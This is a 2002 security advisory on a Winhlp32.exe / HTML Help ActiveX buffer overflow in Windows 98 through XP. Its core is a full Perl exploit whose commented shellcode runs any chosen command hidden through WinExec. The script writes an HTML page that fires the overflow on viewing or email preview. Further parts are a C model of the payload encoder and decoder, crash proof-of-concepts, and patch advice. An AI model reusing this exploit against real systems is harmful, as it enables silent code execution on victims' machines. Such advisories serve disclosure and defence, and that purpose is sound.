2nd Aug 2002 [SBWID-5590]
COMMAND
Winhlp32.exe, Windows Help System Buffer Overflow
SYSTEMS AFFECTED
Windows XP, 2000, NT, ME and 98
PROBLEM
Mark Litchfield [mark@ngssoftware.com] of NGSSoftware
[http://www.ngssoftware.com] in advisory [#NISR01082002] :
Many of the features available in HTML Help are implemented through the
HTML Help ActiveX control (HHCtrl.ocx). The HTML Help ActiveX control
is used to provide navigation features (such as a table of contents),
to display secondary windows and pop-up definitions, and to provide
other features. The HTML Help ActiveX control can be used from topics
in a compiled Help system as well as from HTML pages displayed in a Web
browser. The functionality provided by the HTML Help ActiveX control
will run in the HTML Help Viewer or in any browser that supports
ActiveX technology, such as Internet Explorer (version 3.01 or later).
Some features, as with the WinHlp Command, provided by the HTML Help
ActiveX control are meant to be available only when it is used from a
compiled HTML Help file (.chm) that is displayed by using the HTML Help
Viewer.
Details
*******
Winhlp32.exe is vulnerable to a buffer overrun attack using the Item
parameter within the WinHlp Command. The Item parameter is used to
specify the file path of the WinHelp (.hlp) file in which the WinHelp
topic is stored, and the window name of the target window. Using this
overrun, an attacker can successfully execute arbitrary code on a remote
system by either encouraging the victim to visit a particular web page,
whereby code would execute automatically, or by including the exploit
within the source of an email. With regard to email, execution would
occur automatically when the mail appears in the preview pane and
ActiveX objects are allowed (this is allowed by default; the Internet
security settings would have to be set to High to prevent exploitation
of this vulnerability). Any exploit would execute in the context of the
logged-on user.
Exploit (Update 20 August 2002)
=======
#!/usr/bin/perl
# Winhlp32.exe Remote BufferOverrun exploit code. written by Gary O'leary-Steele Sec-1 Ltd. Garyo@sec-1.com
# For use as proof of concept
# Kernel32.dll version 5.0.2195.4272
####### Kernel32 jmp ebx 77E87793
use strict;
use warnings;

# Stage-one shellcode: locate the marker "zzzz" in the buffer, decode the
# command that follows it (every byte was shifted up by 65 by encode() below),
# NUL-terminate it at "XXXX" and hand it to WinExec with SW_HIDE.
my $sploit =
    "\x55\x8b\xec\x8b\xc3".            # push ebp; mov ebp,esp; mov eax,ebx (\xc5 is ebp, change if error)
    "\xbe\xff\xff\xff\xff".            # mov esi, 0xffffffff
    "\x81\xEE\x85\x85\x85\x85".        # sub esi, 0x85858585 -> esi = 0x7a7a7a7a ("zzzz"), built without NUL bytes
    "\x83\xc0\x01".                    # add eax, 1
    "\x8b\x10".                        # mov edx, [eax]
    "\x3b\xd6".                        # cmp edx, esi
    "\x75\xf7".                        # jne back to add eax,1: scan forward for "zzzz"
    "\x8b\xd8".                        # mov ebx, eax
    "\x83\xc3\x01".                    # add ebx, 1
    "\x80\x6b\x03\x41".                # sub byte [ebx+3], 0x41: undo the +65 encoding, one byte per pass
    "\x8b\x7b\x04".                    # mov edi, [ebx+4]
    "\x81\xff\x58\x58\x58\x58".        # cmp edi, 0x58585858 ("XXXX")
    "\x75\xEE".                        # jne back to add ebx,1: loop until the terminator is reached
    "\x81\x6b\x04\x58\x58\x58\x58".    # sub dword [ebx+4], 0x58585858: turns "XXXX" into four NULs
    "\x33\xf6".                        # xor esi, esi
    "\x56".                            # push esi (uCmdShow = SW_HIDE)
    "\x83\xc0\x04".                    # add eax, 4: eax now points at the decoded command
    "\x50".                            # push eax (lpCmdLine)
    "\xbb\x94\xee\xe8\x77".            # mov ebx, 0x77e8ee94 winexec() address
    "\xff\xd3";                        # call ebx
my $exitproc =
    "\xBB\x5d\xa9\xe8\x77".            # mov ebx, 0x77e8a95d
    "\x83\xeb\x01".                    # sub ebx, 1
    "\xff\xd3";                        # call ebx
my $RET  = "\x24\xF1\x5d\x01";
my $EIP2 = "\x93\x77\xe8\x77";         # This works: jmp ebx at 0x77e87793 (see above)
#my $EIP2 = "\xf6\xbf\x30\x78";
# direct jump = 0006FBD4 ##$EIP2 = "\xd4\xfb\x06\x00";

print "Exploit code for Winhlp32.exe Remote BufferOverrun.\nBy Gary Oleary-Steele Sec-1 Ltd\nCalls WinExec SW_HIDE and executes supplied command\nTested on windows 2000 professional SP2\n\n";
print "Enter Command to execute: ";
my $command = <STDIN>;
print "Enter Output File: ";
my $outputfile = <STDIN>;
chomp $command;
chomp $outputfile;
open(my $infile, '>', $outputfile) or die "cannot open $outputfile: $!\n";

$command = encode($command);
# The command plus NOP padding always occupies 123 bytes so that $exitproc,
# $RET and $EIP2 land at fixed offsets; a longer command would shift them.
my $nn = 123 - length($command);
die "command too long: at most 123 bytes\n" if $nn < 0;
my $nops = "\x90" x $nn;
my $exploit = $sploit . "zzzz" . $command . 'XXXX' . $nops . $exitproc . $RET . $EIP2;

# HTML wrapper: the overflow string is placed in the Item1 parameter of the
# WinHelp command and HHClick() triggers the control.
my $f1 = <<"file1";
<OBJECT classid=clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11
codeBase=hhctrl.ocx#Version=4,72,8252,0 height=0 id=winhelp
type=application/x-oleobject width=0><PARAM NAME="Width"
VALUE="26"><PARAM NAME="Height" VALUE="26"><PARAM NAME="Command"
VALUE="WinHelp"><PARAM NAME="Item1"
VALUE='
file1
chomp $f1;
my $f2 = <<"file2";
'><PARAM
NAME="Item2" VALUE="Sec-1 LTD"></OBJECT>
<SCRIPT>winhelp.HHClick()</SCRIPT>
file2
print {$infile} $f1 . $exploit . $f2;
close $infile;

# Shift every byte of the command up by 65 (0x41). Printable ASCII 32..126
# becomes 97..191, so the command carries no NUL, quote or '<' into the
# single-quoted attribute value; the shellcode subtracts 0x41 again at run time.
sub encode {
    my ($cmd) = @_;
    my $newchar = '';
    for my $i (0 .. length($cmd) - 1) {
        my $chartoconvert = ord(substr($cmd, $i, 1)); # pull out each character and convert to a dec
        $chartoconvert += 65;                          # apply the shift
        $newchar .= chr($chartoconvert);               # convert back to chr
    }
    print $newchar;
    return $newchar;
}
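The shellcode above is a small decoder: it scans forward for the "zzzz" marker, subtracts 0x41 from each following byte until the next four bytes read "XXXX", turns that terminator into NULs and pushes the resulting string to WinExec. The C below is an added reference model of that loop and of the Perl encode() sub, written for this page and not taken from the Sec-1 exploit; the marker, the terminator, the 0x41 shift and the 123-byte command limit are the exploit's, while the buffer-length checks, the rejection of bytes above 0xff - 0x41 and the roundtrip_ok() helper are additions (the real shellcode has no bounds checking at all).

```c
/* Reference model, in portable C, of the encode() sub and the decoder loop
 * in the Winhlp32 exploit above. Added example, not part of the exploit. */
#include <stddef.h>
#include <stdio.h>
#include <string.h>

#define SHIFT    0x41   /* encode() adds 65; "sub byte [ebx+3],0x41" removes it */
#define MAX_CMD  123    /* the Perl pads command + NOPs to exactly 123 bytes */

static const unsigned char MARKER[4] = { 'z', 'z', 'z', 'z' };  /* 0x7a7a7a7a */
static const unsigned char TERM[4]   = { 'X', 'X', 'X', 'X' };  /* 0x58585858 */

/* Shift every byte of cmd up by SHIFT, as the Perl encode() does.
 * Returns the encoded length, or 0 if the command is empty, longer than
 * MAX_CMD, or contains a byte that would not survive the shift in 8 bits
 * (added check: the Perl chr() would silently produce a wide character). */
size_t encode_command(const char *cmd, unsigned char *out, size_t outlen)
{
    size_t n = strlen(cmd);
    if (n == 0 || n > MAX_CMD || n > outlen)
        return 0;
    for (size_t i = 0; i < n; i++) {
        unsigned char c = (unsigned char)cmd[i];
        if (c > 0xff - SHIFT)
            return 0;
        out[i] = (unsigned char)(c + SHIFT);
    }
    return n;
}

/* Lay out "zzzz" + encoded command + "XXXX", the middle of the Perl
 * concatenation $sploit . "zzzz" . $command . 'XXXX' ... Returns the number
 * of bytes written, 0 on error. */
size_t build_payload(const char *cmd, unsigned char *buf, size_t buflen)
{
    unsigned char enc[MAX_CMD];
    size_t n = encode_command(cmd, enc, sizeof enc);
    if (n == 0 || buflen < 4 + n + 4)
        return 0;
    memcpy(buf, MARKER, 4);
    memcpy(buf + 4, enc, n);
    memcpy(buf + 4 + n, TERM, 4);
    return 4 + n + 4;
}

/* What the shellcode does at run time. Returns a pointer to the plaintext
 * command inside buf (the value the shellcode pushes as lpCmdLine), or NULL
 * where the shellcode would read past the end of the buffer. */
char *decode_in_place(unsigned char *buf, size_t len)
{
    size_t i = 0;
    /* add eax,1 / mov edx,[eax] / cmp edx,esi / jne : find "zzzz" */
    for (;;) {
        if (i + 4 > len)
            return NULL;                    /* added bounds check */
        if (memcmp(buf + i, MARKER, 4) == 0)
            break;
        i++;
    }
    size_t p = i + 4;                       /* first encoded byte */
    /* add ebx,1 / sub byte [ebx+3],0x41 / mov edi,[ebx+4] / cmp edi,"XXXX" / jne :
     * decode one byte, then test whether the next four bytes are the terminator */
    for (;;) {
        if (p + 1 + 4 > len)
            return NULL;                    /* added bounds check */
        buf[p] -= SHIFT;
        p++;
        if (memcmp(buf + p, TERM, 4) == 0)
            break;
    }
    memset(buf + p, 0, 4);                  /* sub dword [ebx+4],0x58585858 -> 00 00 00 00 */
    return (char *)(buf + i + 4);           /* add eax,4 ; push eax */
}

/* Encode cmd, decode it again as the shellcode would, and compare. */
int roundtrip_ok(const char *cmd)
{
    unsigned char buf[256];
    size_t n = build_payload(cmd, buf, sizeof buf);
    if (n == 0)
        return 0;
    char *out = decode_in_place(buf, n);
    return out != NULL && strcmp(out, cmd) == 0;
}

int main(void)
{
    const char *cmd = "cmd.exe /c echo 'quotes' < and > survive";   /* constructed sample */
    printf("%s: %s\n", cmd, roundtrip_ok(cmd) ? "round-trips" : "FAILED");
    return roundtrip_ok(cmd) ? 0 : 1;
}
```

Two properties of the scheme are visible here: the terminator test runs over the still-encoded bytes, so a plaintext byte 0x17 (which encodes to 'X') could end the command early, and nothing in the decoder knows how long the buffer is, which is why the model returns NULL where the shellcode would keep walking.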
-Also-
Jelmer adds :
I just installed Service Pack 3 and the following code still crashed my
IE6 with a "memory could not be referenced" error.
<OBJECT ID=hhctrl TYPE="application/x-oleobject"
CLASSID="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11">
<PARAM name="Command" value="Shortcut">
<PARAM name="Button" value="Bitmap:shortcut">
<PARAM name="Item1" value=",,">
<PARAM name="Item2" value="273,1,1">
<PARAM name="codebase" value="">
<PARAM name="Font" value=" A VERY VERY LONG STRING ">
</OBJECT>
I have been told this means it is most likely exploitable. I am not
into buffer overflows myself though; maybe someone can confirm this.
Anyway, I notified Microsoft of this several months ago. The day after
I notified them someone pointed me to the ngssoftware advisory *sob*,
and I notified Microsoft that this was probably the same issue; the last
I heard from them they were looking into whether this was indeed the
case. It's been several months and as far as I know they are still
looking.
Update (03 October 2002)
======
David Litchfield [david@ngssoftware.com] of NGS Insight Security
Research in a new advisory [#NISR02102002], says :
http://www.ngssoftware.com/advisories/ms-winhlp.txt
--snapp--
The Windows Help system includes an ActiveX control known as the HTML
Help Control, hhctrl.ocx. The "Alink" function of this control is
vulnerable to a buffer overflow that can be exploited to gain control
of the user's machine.
--snapp--
Update (10 October 2002)
======
In Thor Larholm's [thor@pivx.com] advisory [http://www.pivx.com]:
--snipp--
we feel that it will benefit and empower end users more if they are able
to easily verify for themselves whether they are using a vulnerable
version of Windows Help. Others have recently made the public aware of
this vulnerability as well, though without disclosing any actual
details.
Exploit:
<script>showHelp(new Array(797).join("A"));</script>  <!-- showHelp( A*796 ): a string of 796 'A's -->
Simple, one-click test case
http://www.pivx.com/larholm/adv/TL004/simple.html
Try your own numbers
http://www.pivx.com/larholm/adv/TL004/number.html
--snapp--
SOLUTION
NGSSoftware highly recommend installing Microsoft Windows SP3, as the
fix has been built into this service pack found at
http://www.microsoft.com
An alternative to these patches would be to ensure the security
settings found in the Internet Options is set to high. Despite the
Medium setting, stating that unsigned ActiveX controls will not be
downloaded, Kylie will still execute Calc.exe. Another alternative
would be to remove winhlp32.exe if it is not required within your
environment.
Update (03 October 2002)
======
Microsoft have produced a patch which is available from their web site.
More details are available from :
http://www.microsoft.com/technet/treeview/?url=/technet/security/bulletin/MS02-055.asp